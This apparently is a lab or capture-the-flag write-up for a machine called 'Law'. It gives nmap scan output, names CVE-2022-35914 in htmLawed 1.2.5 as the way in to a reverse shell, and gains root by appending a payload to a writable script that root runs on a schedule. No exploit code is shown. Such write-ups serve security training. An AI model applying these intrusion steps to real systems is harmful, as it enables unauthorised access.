Law

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.158.190
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-11 14:18 +08
Nmap scan report for 192.168.158.190
Host is up (0.0086s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: htmLawed (1.2.5) test
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds

Initial Access

Port 80

A website is running on port 80.

Upon inspection, we can see that the website is the htmLawed test page, version 1.2.5 (this matches the http-title reported by nmap).

CVE-2022-35914

Searching online for this version points us to CVE-2022-35914, a PHP code injection in htmLawedTest.php.

We run the exploit as follows to trigger the reverse shell.

After running the exploit, we are able to get the reverse shell.

Privilege Escalation

Exploiting script used by root

We use pspy to check whether root is running any process on a schedule; it shows a bash script being executed by root at regular intervals.

When we go to that folder, we find that the bash script is writable by our user.

After appending a reverse shell payload to the script, the next scheduled run gives us a reverse shell as root.
